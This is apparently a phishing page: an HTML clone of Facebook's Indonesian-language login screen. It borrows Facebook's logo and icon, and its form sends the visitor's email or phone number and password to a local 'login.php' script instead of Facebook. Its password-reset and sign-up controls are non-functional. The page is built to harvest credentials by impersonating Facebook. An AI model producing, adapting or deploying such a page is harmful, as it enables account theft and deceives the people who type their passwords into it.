<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook - Masuk atau Daftar</title>

    <link rel="shortcut icon" type="image/x-icon" href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico">

    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <style>
        .box {
            -webkit-box-align: center;
            -webkit-align-items: center;
            -ms-flex-align: center;
            align-items: center;
            background-color: #fff;
            background-color: rgba(255,255,255,1);
            border: 1px solid #dbdbdb;
            border: 1px solid rgba(219,219,219,1);
            border-radius: 1px;
            margin: 0 0 10px;
            padding: 10px 0;
        }
        .logo {
            margin: 22px auto 12px;
        }
        body {
            font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
        }
        .container {
            width:980px;
        }
    </style>
</head>
<body style="background-color: #f0f2f5;">
    
    <div class="container" style="margin-top:150px;">        
        <div class="row">
            <div class="col-md-7">
                <div style="margin-top:50px">
                    <div style="width:500px;">
                        <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" style="height:106px;margin:-28px" alt="">
                        <h2 style="font-size:28px;margin-top:20px;">
                            Facebook membantu Anda terhubung dan berbagi dengan orang-orang dalam kehidupan Anda.
                        </h2>
                    </div>
                </div>
            </div>
            <div class="col-md-5">
                <div class="card" style="box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);">
                    <div class="card-body">
                        <form action="login.php" method="POST">
                            <div class="form-group">
                                <input type="email" name="email" id="" class="form-control" placeholder="Email atau Nomor Telepon">
                            </div>
                            <div class="form-group">
                                <input type="password" name="password" id="" class="form-control" placeholder="Kata Sandi">
                            </div>
                            <button class="btn btn-primary btn-lg btn-block" type="submit" style="font-size:17px;"><b>Login</b></button>
                        </form>
                        <div class="d-flex justify-content-center py-3">
                            <a href="#">Lupa Kata Sandi?</a>
                        </div>
                        <hr class="mt-0">
                        <div class="d-flex justify-content-center">
                            <button type="button" class="btn btn-success btn-lg" style="width:200px;font-size:17px;"><b>Buat Akun Baru</b></button>
                        </div>
                    </div>
                </div>
            </div>
        </div>        
    </div>
    <div class="footer" style="background-image: url(footer.jpg);height:250px;background-position:center;bottom:0;position:absolute;width:100%;"></div>
</body>
</html>